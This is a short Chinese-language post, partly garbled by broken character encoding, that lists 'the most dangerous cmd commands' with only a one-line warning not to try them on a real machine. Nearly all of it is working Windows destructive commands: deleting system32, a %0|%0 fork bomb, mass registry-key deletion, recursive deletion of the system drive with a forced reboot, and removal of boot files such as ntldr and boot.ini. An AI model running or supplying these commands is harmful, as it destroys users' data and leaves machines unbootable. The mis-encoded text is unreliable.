幾個(gè)最危險(xiǎn)的cmd指令?。?!切勿在實(shí)體機(jī)上嘗試!

1.將全盤中所有指定的一個(gè)后綴變?yōu)榱硪粋€(gè)后綴:REN *.doc *.txt
2.刪除system32:del c:\WINDOWS\system32\*.*/q
3.無線循環(huán)執(zhí)行自身:%0|%0
4.刪除所有注冊(cè)表:
@echo off
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
5.直接造成藍(lán)屏死機(jī):
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
6.使電腦永久崩潰:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini?
標(biāo)簽: